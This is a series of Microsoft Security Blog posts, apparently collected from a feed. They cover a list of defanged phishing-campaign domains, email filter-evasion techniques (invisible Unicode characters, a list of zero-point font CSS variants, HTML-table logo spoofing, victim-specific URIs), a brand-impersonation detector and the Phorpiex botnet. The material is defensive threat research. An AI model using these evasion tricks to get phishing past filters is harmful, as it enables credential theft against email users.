trashxn-euyr14[.]com trashxn-euyr12[.]com trashxn-euyr11[.]com
trashxn-euyr10[.]com trashxn-euyr1[.]com berangberang-9[.]com
berangberang-7[.]com berangberang-12[.]com berangberang-6[.]com
notoficationdeliveryamazon8[.]com berangberang-8[.]com berangberang-3[.]com
berangberang-4[.]com berangberang-10[.]com berangberang-11[.]com
berangberang-13[.]com berangberang-5[.]com 77support-update23-4[.]com
posher876ffffff-30[.]com posher876ffffff-5[.]com posher876ffffff-25[.]com
fenranutc0x24ai-11[.]com organix-xtc21[.]com fenranutc0x24ai-13[.]com
fenranutc0x24ai-4[.]com fenranutc0x24ai-17[.]com fenranutc0x24ai-18[.]com
adminsecurity102[.]com adminsecurity101[.]com 23moesian-17[.]com
23moesian-10[.]com 23moesian-11[.]com 23moesian-26[.]com
23moesian-19[.]com 23moesian-2[.]com cokils2ptys-3[.]com
cokils2ptys-1[.]com 23moesian-20[.]com 23moesian-15[.]com
23moesian-18[.]com 23moesian-16[.]com sux71a37-net19[.]com
sux71a37-net1[.]com sux71a37-net25[.]com sux71a37-net14[.]com
sux71a37-net18[.]com sux71a37-net15[.]com sux71a37-net12[.]com
sux71a37-net13[.]com sux71a37-net20[.]com sux71a37-net11[.]com
sux71a37-net27[.]com sux71a37-net2[.]com sux71a37-net21[.]com
bimspelitskalix-xuer9[.]com account-info005[.]com irformainsition0971a8-net16[.]com
bas9oiw88remnisn-12[.]com bas9oiw88remnisn-27[.]com bas9oiw88remnisn-26[.]com
bas9oiw88remnisn-11[.]com bas9oiw88remnisn-10[.]com bas9oiw88remnisn-5[.]com
bas9oiw88remnisn-13[.]com bas9oiw88remnisn-1[.]com bas9oiw88remnisn-7[.]com
bas9oiw88remnisn-3[.]com bas9oiw88remnisn-20[.]com bas9oiw88remnisn-8[.]com
bas9oiw88remnisn-23[.]com bas9oiw88remnisn-24[.]com bas9oiw88remnisn-4[.]com
bas9oiw88remnisn-25[.]com romanseyilefreaserty0824r-2[.]com romanseyilefreaserty0824r-1[.]com
sux71a37-net26[.]com sux71a37-net10[.]com sux71a37-net17[.]com
maills-activitymove02[.]com maills-activitymove04[.]com solution23-servviue-26[.]com
maills-activitymove01[.]com copris7-yearts-6[.]com copris7-yearts-9[.]com
copris7-yearts-5[.]com copris7-yearts-8[.]com copris7-yearts-37[.]com
securityaccount102[.]com copris7-yearts-4[.]com copris7-yearts-40[.]com
copris7-yearts-7[.]com copris7-yearts-38[.]com copris7-yearts-39[.]com
romanseyilefreaserty0824r-6[.]com rick845ko-3[.]com rick845ko-2[.]com
rick845ko-10[.]com fasttuamz587-4[.]com winb2as-wwersd76-19[.]com
winb2as-wwersd76-4[.]com winb2as-wwersd76-6[.]com org77supp-minty662-8[.]com
winb2as-wwersd76-18[.]com winb2as-wwersd76-1[.]com winb2as-wwersd76-10[.]com
org77supp-minty662-9[.]com winb2as-wwersd76-12[.]com winb2as-wwersd76-20[.]com
account-info003[.]com account-info012[.]com account-info002[.]com
laser9078-ter17[.]com account-info011[.]com account-info007[.]com
notoficationdeliveryamazon1[.]com notoficationdeliveryamazon20[.]com notoficationdeliveryamazon7[.]com
notoficationdeliveryamazon17[.]com notoficationdeliveryamazon12[.]com contackamazon1[.]com
notoficationdeliveryamazon6[.]com notoficationdeliveryamazon5[.]com notoficationdeliveryamazon4[.]com
notoficationdeliveryamazon18[.]com notoficationdeliveryamazon13[.]com notoficationdeliveryamazon3[.]com
notoficationdeliveryamazon14[.]com gaplerr-xt5[.]com posher876ffffff-29[.]com
kenatipurecehkali-xt3[.]com kenatipurecehkali-xt13[.]com kenatipurecehkali-xt4[.]com
kenatipurecehkali-xt12[.]com kenatipurecehkali-xt5[.]com wtbwts-junet1[.]com
kenatipurecehkali-xt6[.]com hayalanphezor-2sit[.]com hayalanphezor-1sit[.]com
noticesumartyas-sc24[.]com noticesumartyas-sc13[.]com noticesumartyas-sc2[.]com
noticesumartyas-sc17[.]com noticesumartyas-sc22[.]com noticesumartyas-sc5[.]com
noticesumartyas-sc4[.]com noticesumartyas-sc21[.]com noticesumartyas-sc25[.]com
appgetbox3[.]com notoficationdeliveryamazon19[.]com notoficationdeliveryamazon10[.]com
appgetbox9[.]com appgetbox8[.]com appgetbox6[.]com
notoficationdeliveryamazon2[.]com appgetbox7[.]com appgetbox5[.]com
notoficationdeliveryamazon23[.]com appgetbox10[.]com notoficationdeliveryamazon16[.]com
hvgjgj-shoes08[.]com hvgjgj-shoes13[.]com jgkxjhx-shoes09[.]com
hvgjgj-shoes15[.]com hvgjgj-shoes16[.]com hvgjgj-shoes18[.]com
hvgjgj-shoes20[.]com hvgjgj-shoes12[.]com jgkxjhx-shoes02[.]com
hvgjgj-shoes10[.]com jgkxjhx-shoes03[.]com hvgjgj-shoes11[.]com
hvgjgj-shoes14[.]com jgkxjhx-shoes05[.]com jgkxjhx-shoes04[.]com
hvgjgj-shoes19[.]com jgkxjhx-shoes08[.]com hpk02h21yyts-6[.]com
romanseyilefreaserty0824r-7[.]com gets25-amz[.]net gets30-amz[.]net
gets27-amz[.]net gets28-amz[.]net gets29-amz[.]net
gets32-amz[.]net gets3-amz[.]net gets31-amz[.]net
noticesumartyas-sc19[.]com noticesumartyas-sc23[.]com noticesumartyas-sc18[.]com
noticesumartyas-sc15[.]com noticesumartyas-sc20[.]com noticesumartyas-sc16[.]com
noticesumartyas-sc29[.]com rick845ko-1[.]com bas9oiw88remnisn-9[.]com
rick845ko-5[.]com bas9oiw88remnisn-21[.]com bas9oiw88remnisn-2[.]com
bas9oiw88remnisn-19[.]com rick845ko-6[.]com bas9oiw88remnisn-22[.]com
bas9oiw88remnisn-17[.]com bas9oiw88remnisn-16[.]com adminmabuk103[.]com
account-info008[.]com suppamz2-piryshj01-3[.]com dak12shub-1[.]com
securemanageprodio-02[.]com securemanageprodio-05[.]com securemanageprodio-01[.]com
dak12shub-3[.]com dak12shub-9[.]com dak12shub-8[.]com
dak12shub-6[.]com dak12shub-10[.]com dak12shub-4[.]com
securemanageprodio-03[.]com org77supp-minty662-7[.]com winb2as-wwersd76-7[.]com
org77supp-minty662-10[.]com bimspelitskalix-xuer2[.]com gets34-amz[.]net
gets35-amz[.]net service-account-7254[.]com service-account-76357[.]com
service-account-7247[.]com account-info004[.]com service-account-5315[.]com
bas9oiw88remnisn-14[.]com solution23-servviue-23[.]com organix-xtc18[.]com
romanseyilefreaserty0824r-4[.]com hayalanphezor-7sit[.]com bimspelitskalix-xuer7[.]com
securemanageprodio-04[.]com solution23-servviue-15[.]com solution23-servviue-1[.]com
suppamz2-piryshj01-9[.]com suppamz2-piryshj01-6[.]com solution23-servviue-25[.]com
solution23-servviue-7[.]com solution23-servviue-16[.]com solution23-servviue-11[.]com
solution23-servviue-27[.]com romanseyilefreaserty0824r-5[.]com cokils2ptys-6[.]com
solution23-servviue-9[.]com solution23-servviue-19[.]com solution23-servviue-8[.]com
solution23-servviue-17[.]com solution23-servviue-18[.]com suppamz2-piryshj01-1[.]com
solution23-servviue-30[.]com solution23-servviue-13[.]com solution23-servviue-12[.]com
solution23-servviue-10[.]com solution23-servviue-4[.]com solution23-servviue-20[.]com
solution23-servviue-24[.]com solution23-servviue-5[.]com solution23-servviue-14[.]com
service-account-7243[.]com service-account-735424[.]com service-account-8457845[.]com
service-account-374567[.]com service-account-764246[.]com service-account-762441[.]com
gxnhfghnjzh809[.]com xcfhjxfyxnhnjzh10[.]com accountservicealert002[.]com
accountservicealert003[.]com care887-yyrtconsumer23-24[.]com bas9oiw88remnisn-15[.]com
care887-yyrtconsumer23-23[.]com care887-yyrtconsumer23-27[.]com care887-yyrtconsumer23-25[.]com
care887-yyrtconsumer23-26[.]com laser9078-ter11[.]com bimspelitskalix-xuer6[.]com
laser9078-ter10[.]com hayalanphezor-6sit[.]com hayalanphezor-4sit[.]com
hayalanphezor-3sit[.]com romanseyilefreaserty0824r-3[.]com solution23-servviue-6[.]com
ressstauww-6279-3[.]com ressstauww-6279-10[.]com sytesss-tas7[.]com
ressstauww-6279-7[.]com ressstauww-6279-1[.]com hvgjgj-shoes01[.]com
ketiak-muser14[.]com ketiak-muser13[.]com ketiak-muser15[.]com
spammer-comingson01[.]com spammer-comingson02[.]com spammer-comingson04[.]com
spammer-comingson05[.]com spammer-comingson07[.]com posidma-posidjar01[.]com
posidma-posidjar03[.]com posidma-posidjar05[.]com posidma-posidjar06[.]com
tembuslah-bandar01[.]com tembuslah-bandar02[.]com tembuslah-bandar03[.]com
tembuslah-bandar04[.]com tembuslah-bandar05[.]com tembuslah-bandar06[.]com
tembuslah-bandar07[.]com tembuslah-bandar08[.]com tembuslah-bandar09[.]com
tembuslah-bandar10[.]com

The post Widespread credential phishing campaign abuses open redirector links appeared first on Microsoft Security Blog.

Trend-spotting email techniques: How modern phishing emails hide in plain sight

August 18th, 2021 No comments

With the massive volume of emails sent each day, coupled with the many methods that attackers use to blend in, identifying the unusual and malicious is more challenging than ever. An obscure Unicode character in a few emails is innocuous enough, but when a pattern of emails containing this obscure character accompanied by other HTML quirks, strange links, and phishing pages or malware is observed, it becomes an emerging attacker trend to investigate. We closely monitor these kinds of trends to gain insight into how best to protect customers.

This blog shines a light on techniques that are prominently used in many recent email-based attacks. We’ve chosen to highlight these techniques based on their observed impact to organizations, their relevance to active email campaigns, and because they are intentionally designed to be difficult to detect. They hide text from users, masquerade as the logos of trusted companies, and evade detection by using common web practices that are usually benign:

  • Brand impersonation with procedurally-generated graphics
  • Text padding with invisible characters
  • Zero-point font obfuscation
  • Victim-specific URI

We’ve observed attackers employ these tricks to gain initial access to networks. Although the examples we present were primarily seen in credential theft attacks, any of these techniques can be easily adapted to deliver malware.

By spotting trends in the threat landscape, we can swiftly respond to potentially malicious behavior. We use the knowledge we gain from our investigations to improve customer security and build comprehensive protections. Through security solutions such as Microsoft Defender for Office 365 and the broader Microsoft 365 Defender, we deliver durable and comprehensive protection against the latest attacker trends.

Brand impersonation with procedurally-generated graphics

We have observed attackers using HTML tables to imitate the logos and branding of trusted organizations. In one recent case, an attacker created a graphic resembling the Microsoft logo by using a 2×2 HTML table and CSS styling to closely match the official branding.

Spoofed logos created with HTML tables allow attackers to bypass brand impersonation protections. Malicious content arrives in users’ inboxes, appearing to recipients as if it were a legitimate message from the company. While Microsoft Defender for Office 365 data shows a decline in the usage of this technique over the last few months, we continue to monitor for new ways that attackers will use procedurally-generated graphics in attacks.

Figure 1. Tracking data for small 2×2 HTML tables

How it works

A graphic resembling a trusted organization’s official logo is procedurally generated from HTML and CSS markup. It’s a fileless way of impersonating a logo, because there are no image files for security solutions to detect. Instead, the graphic is constructed out a specially styled HTML table that is embedded directly in the email.

Of course, inserting an HTML table into an email is not malicious on its own. The malicious pattern emerges when we view this technique in context with the attacker’s goals.

Two campaigns that we have been tracking since April 2021 sent targets emails that recreated the Microsoft logo. They impersonated messages from Office 365 and SharePoint. We observed the following email subjects:

  • Action Required: Expiration Notice On <Email Address>
  • Action Required: 3 Pending Messages sent <date>
  • New 1 page incoming eFax© message for “<Email Alias>”

Figure 2. Sample emails that use HTML code to embed a table designed to mimic the Microsoft logo

Upon extracting the HTML used in these emails, Microsoft analysts determined that the operators used the HTML table tag to create a 2×2 table resembling the Microsoft logo. The background color of each of the four cells corresponded to the colors of the quadrants of the official logo.

Figure 3. Page source of the isolated HTML mimicking the Microsoft logo

HTML and CSS allow for colors to be referenced in several different ways. Many colors can be referenced in code via English language color names, such as “red” or “green”. Colors can also be represented using six-digit hexadecimal values (i.e., #ffffff for white and #000000 for black), or by sets of three numbers, with each number signifying the amount of red, green, or blue (RGB) to combine. These methods allow for greater precision and variance, as the designer can tweak the numbers or values to customize the color’s appearance.

Figure 4. Color values used to replicate the Microsoft logo

As seen in the above screenshot, attackers often obscure the color references to the Microsoft brand by using color names, hexadecimal, and RGB to color in the table. By switching up the method they use to reference the color, or slightly changing the color values, the attacker can further evade detection by increasing variance between emails.

Text padding with invisible characters

In several observed campaigns, attackers inserted invisible Unicode characters to break up keywords in an email body or subject line in an attempt to bypass detection and automated security analysis. Certain characters in Unicode indicate extremely narrow areas of whitespace, or are not glyphs at all and are not intended to render on screen.

Some invisible Unicode characters that we have observed being used maliciously include:

  • Soft hyphen (U+00AD)
  • Word joiner (U+2060)

Both of these are control characters that affect how other characters are formatted. They are not glyphs and would not even be visible to readers, in most cases. As seen in the following graph, the use of the soft hyphen and word joiner characters has seen a steady increase over time. These invisible characters are not inherently malicious, but seeing an otherwise unexplained rise of their use in emails indicates a potential shift in attacker techniques.

Figure 5. Tracking data for the invisible character obfuscation technique

How it works

When a recipient views a malicious email containing invisible Unicode characters, the text content may appear indistinguishable from any other email. Although not visible to readers, the extra characters are still included in the body of the email and are “visible” to filters or other security mechanisms. If attackers insert extra, invisible characters into a word they don’t want security products to “see,” the word might be treated as qualitatively different from the same word without the extra characters. This allows the keyword to evade detection even if filters are set to catch the visible part of the text.

Invisible characters do have legitimate uses. They are, for the most part, intended for formatting purposes: for instance, to indicate where to split a word when the whole word can’t fit on a single line. However, an unintended consequence of these characters not displaying like ordinary text is that malicious email campaign operators can insert the characters to evade security.

The animated GIF below shows how the soft hyphen characters are typically used in a malicious email. The soft hyphen is placed between each letter in the red heading to break up several key words. It’s worth noting that the soft hyphens are completely invisible to the reader until the text window is narrowed and the heading is forced to break across multiple lines.

Figure 6. Animation showing the use of the invisible soft hyphen characters

In the following example, a phishing email has had invisible characters inserted into the email body: specifically, in the “Keep current Password” text that links the victim to a phishing page.

Figure 7. Microsoft Office 365 phishing email using invisible characters to obfuscate the URL text.

The email appears by all means “normal” to the recipient, however, attackers have slyly added invisible characters in between the text “Keep current Password.” Clicking the URL directs the user to a phishing page impersonating the Microsoft single sign-on (SSO) page.

In some campaigns, we have seen the invisible characters applied to every word, especially any word referencing Microsoft or Microsoft products and services.

Zero-point font obfuscation

This technique involves inserting hidden words with a font size of zero into the body of an email. It is intended to throw off machine learning detections, by adding irrelevant sections of text to the HTML source making up the email body. Attackers can successfully obfuscate keywords and evade detection because recipients can’t see the inserted text—but security solutions can.

Microsoft Defender for Office 365 has been blocking malicious emails with zero-point font obfuscation for many years now. However, we continue to observe its usage regularly.

Figure 8. Tracking data for emails containing zero-point fonts experienced surges in June and July 2021

How it works

Similar to how there are many ways to represent colors in HTML and CSS, there are also many ways to indicate font size. We have observed attackers using the following styling to insert hidden text via this technique:

  • font-size: 0px
  • font-size: 0.0000em
  • font-size: 0vw
  • font-size: 0%
  • font: italic bold 0.0px Georgia, serif
  • font: italic bold 0em Georgia, serif
  • font: italic bold 0vw Georgia, serif
  • font: italic bold 0% Georgia, serif

Being able to add zero-width text to a page is a quirk of HTML and CSS. It is sometimes used legitimately for adding meta data to an email or to adjust whitespace on a page. Attackers repurpose this quirk to break up words and phrases a defender might want to track, whether to raise an alert or block the content entirely. As with the invisible Unicode character technique, certain kinds of security solutions might treat text containing these extra characters as distinct from the same text without the zero-width characters. This allows the visible keyword text to slip past security.

In a July 2021 phishing campaign blocked by Microsoft Defender for Office 365, the attacker used a voicemail lure to entice recipients into opening an email attachment. Hidden, zero-width letters were added to break up keywords that might otherwise have been caught by a content filter. The following screenshot shows how the email appeared to targeted users.

Figure 9. Sample email that uses the zero-point font technique

Those with sharp eyes might be able to spot the awkward spaces where the attacker inserted letters that are fully visible only within the HTML source code. In this campaign, the obfuscation technique was also used in the malicious email attachment, to evade file-hash based detections.

Figure 10. The HTML code of the email body, exposing the use of the zero-point font technique

Victim-specific URI

Victim-specific URI is a way of transmitting information about the target and creating dynamic content based upon it. In this technique, a custom URI crafted by the attacker passes information about the target to an attacker-controlled website. This aides in spear-phishing by personalizing content seen by the intended victim. This is often used by the attacker to create legitimate-seeming pages that impersonate the Single Sign On (SSO) experience.

The following graph shows cyclic surges in email content, specifically links that have an email address included as part of the URI. Since custom URIs are such a common web design practice, their usage always returns to a steady baseline in between peaks. The surges appear to be related to malicious activity, since attackers will often send out large numbers of spam emails over the course of a campaign.

Figure 11. Tracking data for emails containing URLs with email address in the PHP parameter

In a campaign Microsoft analysts observed in early May 2021, operators generated tens of thousands of subdomains from Google’s Appspot, creating unique phishing sites and victim identifiable URIs for each recipient. The technique allowed the operators to host seemingly legitimate Microsoft-themed phishing sites on third-party infrastructure.

How it works

The attacker sends the target an email, and within the body of the email is a link that includes special parameters as part of the web address, or URI. The custom URI parameters contain information about the target. These parameters often utilize PHP, as PHP is a programming language frequently used to build websites with dynamic content—especially on large platforms such as Appspot.

Details such as the target’s email address, alias, or domain, are sent via the URI to an attacker-controlled web page when the user visits the link. The attacker’s web page pulls the details from the parameters and use that to present the target with personalized content. This can help the attacker make malicious websites more convincing, especially if they are trying to mimic a user logon page, as the target will be greeted by their own account name.

Custom URIs containing user-specific parameters are not always, or even often, malicious. They are commonly used by all kinds of web developers to transmit pertinent information about a request. A query to a typical search engine will contain numerous parameters concerning the nature of the search as well as information about the user, so that the search engine can provide users with tailored results.

However, in the victim identifiable URI technique, attackers repurpose a common web design practice to malicious ends. The tailored results seen by the target are intended to trick them into handing over sensitive information to an attacker.

In the Compact phishing campaign described by WMC Global and tracked by Microsoft, this technique allowed the operators to host Microsoft-themed phishing sites on any cloud infrastructure, including third-party platforms such as Google’s Appspot. Microsoft’s own research into the campaign in May noted that not only tens of thousands of individual sites were created, but that URIs were crafted for each recipient, and the recipient’s email address was included as a parameter in the URI.

Newer variants of the May campaign started to include links in the email, which routed users through a compromised website, to ultimately redirect them to the Appspot-hosted phishing page. Each hyperlink in the email template used in this version of the campaign was structured to be unique to the recipient.

The recipient-specific information passed along in the URI was used to render their email account name on a custom phishing page, attempting to mimic the Microsoft Single Sign On (SSO) experience. Once on the phishing page, the user was prompted to enter their Microsoft account credentials. Entering that information would send it to the attacker.

Microsoft Defender for Office 365 delivers protection powered by threat intelligence

As the phishing techniques we discussed in this blog show, attackers use common or standard aspects of emails to hide in plain sight and make attacks very difficult to detect or block. With our trend tracking in place, we can make sense of suspicious patterns, and notice repeated combinations of techniques that are highly likely to indicate an attack. This enables us to ensure we protect customers from the latest evasive email campaigns through Microsoft Defender for Office 365. We train machine learning models to keep an eye on activity from potentially malicious domains or IP addresses. Knowing what to look out for, we can rule out false positives and focus on the bad actors.

This has already paid off. Microsoft Defender for Office 365 detected and protected customers from sophisticated phishing campaigns, including the Compact campaign. We also employed our knowledge of prevalent trends to hunt for a ransomware campaign that might have otherwise escaped notice. We swiftly opened an investigation to protect customers from what seemed at first like a set of innocuous emails.

Trend tracking helps us to expand our understanding about prevalent attacker tactics and to improve existing protections. We’ve already set up rules to detect the techniques described in this blog. Our understanding of the threat landscape has led to better response times to critical threats. Meanwhile, deep within Microsoft Defender for Office 365, rules for raising alerts are weighted so that detecting a preponderance of suspicious techniques triggers a response, while legitimate emails are allowed to travel to their intended inboxes.

Threat intelligence also drives what new features are developed, and which rules are added. In this way, generalized trend tracking leads to concrete results. Microsoft is committed to using our knowledge of the threat landscape to continue to track trends, build better protections for our products, and share intelligence with the greater online community.

Learn how to protect all of Office 365 against advanced threats like business email compromise and credential phishing with Microsoft Defender for Office 365.

 

Microsoft 365 Defender Threat Intelligence Team

 

The post Trend-spotting email techniques: How modern phishing emails hide in plain sight appeared first on Microsoft Security Blog.

Spotting brand impersonation with Swin transformers and Siamese neural networks

August 4th, 2021 No comments

Every day, Microsoft Defender for Office 365 encounters around one billion brand impersonation emails. Our security solutions use multiple detection and prevention techniques to help users avoid divulging sensitive information to phishers as attackers continue refining their impersonation tricks. In this blog, we discuss our latest innovation toward developing another detection layer focusing on the visual components of brand impersonation attacks. We presented this approach in our Black Hat briefing Siamese neural networks for detecting brand impersonation today.

Before a brand impersonation detection system can be trained to distinguish between legitimate and malicious email that use the same visual elements, we must first teach it to identify what brand the content is portraying in the first place. Using a combination of machine learning techniques that convert images to real numbers and can perform accurate judgments even with smaller datasets, we have developed a detection system that outperforms all visual fingerprint-based benchmarks on all metrics while maintaining a 90% hit rate. Our system is not simply “memorizing” logos but is making decisions based on other salient aspects such as color schemes or fonts. This, among other state-of-the-art AI that feeds into Microsoft 365 Defender, improves our protection capabilities against the long-standing problem of phishing attacks.

Two-step approach to spot impersonations

In brand impersonation attacks, an email or a website is designed to appear visually identical to a known legitimate brand, like Microsoft 365 or LinkedIn, but the domain—to which user-inputted information, like passwords or credit card details, is sent—is actually controlled by an attacker. Examples of a malicious sign-in page impersonating Microsoft is shown in Figure 1.

Figure 1. Example of a Microsoft brand impersonation attempt

Any vision-based system, computer or human, that detects brand impersonation attacks must take a two-step approach upon receiving content:

  1. Determine whether the content looks like content from a known brand, and if so, which brand
  2. Determine if other artifacts associated with the content (such as URLs, domain names, or certificates) match those used by the identified brand

For example, if a brand impersonation detection system sees an image that appears to come from Microsoft but also notices that the URL is indeed from Microsoft and that the certificate matches a known certificate issued to Microsoft, then the content would be classified as legitimate.

However, if the detector encounters content which shares visual characteristics with legitimate Microsoft content like in Figure 1, but then notices that the URL associated with the content is an unknown or unclassified URL with a suspicious certificate, then the content would be flagged as a brand impersonation attack.

Training our system to identify brands

The key to an effective brand impersonation detection system is identifying known brands as reliably as possible. This is true for both a manual system and an automated one. For sighted humans, the process of identifying brands is straightforward. On the other hand, teaching an automated system to identify brands is more challenging. This is especially true because each brand might have several visually distinct sign-in pages.

For example, Figure 2 shows two Microsoft Excel brand impersonation attempts. While both cases share some visual characteristics, the differences in background, color, and text make the creation of rule-based systems to detect brands based on rudimentary similarity metrics (such as robust image hashing) more difficult. Therefore, our goal was to improve brand labeling, which will ultimately improve brand impersonation detection.

Figure 2. Another examples of brand impersonation attempt targeting Microsoft Excel

Of course, deep learning is the assumed default tool for image recognition, so it was only natural to perform brand detection by combining labeled brand images with modern deep-learning techniques. To do this, we first sought out, captured, and manually labeled over 50,000 brand impersonation screenshots using our own detonation system.

While our dataset consisted of over 1,300 distinct brands, most brands were not well-represented. Appearing less than 5 times are 896 brands while 541 brands only appeared in the dataset once. The lack of significant representation for each brand meant that using standard approaches like a convolutional neural network would not be feasible.

Converting images to real numbers via embeddings

To address the limitations of our data, we adopted a cutting-edge, few-shot learning technique known as Siamese neural networks (sometimes called neural twin networks). However, before explaining what a Siamese neural network is, it is important to understand how embedding-based classifiers work.

Building an embedding-based classifier proceeds in two steps. The first step is to embed the image into a lower dimensional space. All this means is that the classifier transforms the pixels that make up the images into a vector of real numbers. So, for example, the network might take as an input the pixel values in Figure 1 and output the value (1.56, 0.844). Because the network translates the images into two real numbers, we say the network embeds the images into a two-dimensional space.

While in practice we use more than a two-dimensional embedding, Figure 3 shows all our images embedded in two-dimensional space. The red dots represent the embeddings of images all appearing to be from one brand. This effectively translates the visual data into something our neural network can digest.

Figure 3: A two-dimensional representation of embeddings, where the red dots represent one brand

Given the embeddings, the second step of the algorithm is to classify the embedded images. For example, given a set of embedded screenshots and a new screenshot we call X, we can perform brand classification by embedding X and then assigning to X the brand whose image is “closest” to X in the embedded space.

Training the system to minimize contrastive loss

In understanding the two-dimensional embeddings above, readers might assume that there was an “embedder” that placed screenshots of the same brand close together, or at least that there was some inherent meaning in the way the images were embedded. Of course, neither was true. Instead, we needed to train our detector to do this.

This is where Siamese neural networks with an associated contrastive loss come into play. A Siamese network takes as an input two raw images and embeds them both. The contrastive loss the network computes is the distance between the images if the images come from the same brand and the negative of the distance between the images if they come from a different brand. This means that when a Siamese network is trained to minimize losses, it embeds screenshots of the same brand close together and screenshots of different brands far apart. An example of how the network minimizes losses is shown in Figure 4.

Figure 4. Successful Siamese network embeddings. The network minimizes loss by embedding screenshots that pertain to Microsoft close together while simultaneously embedding screenshots from Microsoft and LinkedIn far apart. Note that the algorithm is trained on entire screenshots and not just logos. The logos are used here for illustrative purposes only.

We also mentioned that the Siamese network can perform any type of classification on the embedded images. Therefore, we used standard feedforward neural networks to train the system to perform the classification. The full architecture is illustrated in Figure 5 below. The images were first embedded into a low dimensional space using Swin transformers, a cutting edge computer-vision architecture. The embeddings were then used to calculate the contrastive loss. Simultaneously, the embeddings were fed into a feedforward neural network which then outputted the predicted class. When training the system, the total loss is the sum of the contrastive loss and a standard log-likelihood loss based on the output of both classification networks.

Figure 5. Siamese neural network architecture

Basing success metrics on costs and benefits of correct labelling

Since this is a multi-class classification system, we needed to be careful about how we defined our metrics for success. Specifically, the notions of a true positive or a false negative are not well-defined in multi-class classification problems. Therefore, we developed metrics based on the associated costs and benefits of real-world outcomes. For example, the cost of mislabeling a known brand as another known brand is not the same as observing a never-before-seen brand but labeling it as a known brand. Furthermore, we separated our metrics for known and unknown brands. As a result, we developed the following five metrics:

  1. Hit rate – the proportion of known brands that are correctly labeled
  2. Known misclassification rate – the proportion of known brands that are incorrectly labeled as another known brand
  3. Incorrect unknown rate – the proportion of known brands that are incorrectly labeled as an unknown brand
  4. Unknown misclassification rate – the proportion of screenshots of unknown brands that are labeled as a known brand
  5. Correct unknown rate – the proportion of unknown brands that are correctly labeled as unknown

These metrics are also summarized in Figure 6 below. Since all our images were labeled, we simulated an unknown brand by removing all brands with only one screenshot from the training set and only used them for evaluating our metrics on a held-out test set.

Figure 6. Classification metrics. Metrics with upward-facing triangles indicate that the results are better when they are higher. Metrics with downward-facing triangles are better when they are lower.

Outperforming visual fingerprint-based benchmarks

The main results of our brand impersonation classification system are given in Figure 7 but are straightforward to summarize: Our system outperforms all visual fingerprint-based benchmarks on all metrics while still maintaining a 90% hit rate. The results also show that if instead of maximizing hit rate, it was more beneficial to minimize the known misclassification rate, it is possible to have the known misclassification rate be less than 2% while the hit rate remains above 60% and the Siamese network still beats the visual fingerprint-based approaches on all metrics.

Figure 7. Results of how our system fared against other image recognition systems

We can further examine some examples to show that the network did not simply memorize the screenshots and can correctly label variations on the same brand. Figure 8 shows two different malicious DHL brand impersonation sign-in pages. Despite a different visual layout and color scheme (use of a black bar in the left image, white on the right), the network still correctly classified both. Furthermore, the network was able to correctly classify the image on the left even though it carried several logos of other companies on the bottom bar. This means that the network is doing more than just logo recognition and making decisions based on other features such as color schemes or the dominant font style.

Figure 8. Variations on the DHL sign-in page, both classified correctly by our system as pertaining to DHL

Important applications in detecting phishing campaigns

Phishers have become particularly good at creating phishing websites or crafting emails that closely resemble known legitimate brands visually. This allows them to gain users’ trust and trick them into disclosing sensitive information.

Our work prevents attackers from hijacking legitimate brands by detecting entities that visually look like legitimate brands but do not match other known characteristics or features of that brand. Moreover, this work helps us with threat intelligence generation by clustering known attacks or phishing kits based on the specific brands they target visually and identifying new attack techniques that might impersonate the same brand but employ other attack techniques.

Dedicated research teams in Microsoft stay on top of threats by constantly improving the AI layers that support our threat intelligence which then feeds into our ability to protect against and detect threats. Microsoft Defender for Office 365 protects against email-based threats like phishing and empowers security operations teams to investigate and remediate attacks. Threat data from Defender for Office 365 then increases the quality of signals analyzed by Microsoft 365 Defender, allowing it to provide cross-domain defense against sophisticated attacks.

 

Justin Grana, Yuchao Dai, Jugal Parikh, and Nitin Kumar Goel

Microsoft 365 Defender Research Team

The post Spotting brand impersonation with Swin transformers and Siamese neural networks appeared first on Microsoft Security Blog.

Phorpiex morphs: How a longstanding botnet persists and thrives in the current threat environment

May 20th, 2021 No comments

Phorpiex, an enduring botnet known for extortion campaigns and for using old-fashioned worms that spread via removable USB drives and instant messaging apps, began diversifying its infrastructure in recent years to become more resilient and to deliver more dangerous payloads. Today, the Phorphiex botnet continues to maintain a large network of bots and generates wide-ranging malicious activities.

These activities, which traditionally included extortion and spamming activities, have expanded to include cryptocurrency mining. From 2018, we also observed an increase in data exfiltration activities and ransomware delivery, with the bot installer observed to be distributing Avaddon, Knot, BitRansomware (DSoftCrypt/ReadMe), Nemty, GandCrab, and Pony ransomware, among other malware.

The botnet’s geographic targeting for bot distribution and installation expanded, too. Previous campaigns focused on targets in Japan, but more recent activity showed a shift to a more global distribution.

World map showing global distribution of Phorpiex botnet ativity

Figure 1. Global distribution of Phorpiex botnet activity

The Phorpiex botnet has a reputation for being simplistic and lacking robustness, and it has been hijacked by security researchers in the past. Its tactics, techniques, and procedures (TTPs) have remained largely static, with common commands, filenames, and execution patterns nearly unchanged from early 2020 to 2021. To support its expansion, however, Phorpiex has shifted some of its previous command-and-control (C2) architecture away from its traditional hosting, favoring domain generation algorithm (DGA) domains over branded and static domains.

This evolution characterizes the role of botnets in the threat landscape and the motivation of attackers to persist and remain effective. The threat ecosystem relies on older botnets with large and diverse network of compromised machines to deliver payloads at low costs. And while many of the older botnet architectures have been primarily classified as spam delivery mechanisms, these infrastructures are critical for newer, modular delivery mechanisms.

Phorpiex also demonstrates that bots, which are some of oldest types of threats, continue to affect consumer users but notably brings increasingly more serious threats to enterprise networks. Despite being traditionally associated with lower-risk activity like extortion and spamming, Phorpiex operators’ decision to move to more impactful malware and actions is entirely at the whim of the attackers.

Understanding botnets and associated infrastructure, botnet malware, their activities and payloads, and how they evolve provides insight into attacker motivation and helps ensure durable protection against some of the most prevalent threats today. At Microsoft, we continue to conduct in-depth research into these threats. These expert investigations add to the massive threat intelligence that inform Microsoft 365 Defender services and the protections they provide. Microsoft 365 Defender delivers coordinated cross-domain defense against the various malware, emails, network connections, and malicious activity associated with Phorpiex and other botnets.

Distribution, expansion, and operation

Phorpiex’s sprawling botnet operation can be divided into three main portions:

  1. Distribution of the bot loader: The bot loader has been propagated through a variety of means over the years, including being loaded by other malware, freeware, and unwanted programs, or delivered by phishing emails from already-infected bots. Phorpiex has also spread via productivity platforms, as well as via instant messaging and USB drives.
  2. Mailing botnet: In addition to spreading the bot loader via email, the botnet is used to generate currency. It does so via extortion and spam campaigns as well as through a variety of other types of financially motivated malware.
  3. Malware delivery botnet: In recent years, the botnet has been observed installing ransomware, cryptocurrency miner, and other malware types, indicating the expansion of the botnet’s activities by the Phorpiex operators or as part of malware-as-a-service scheme.
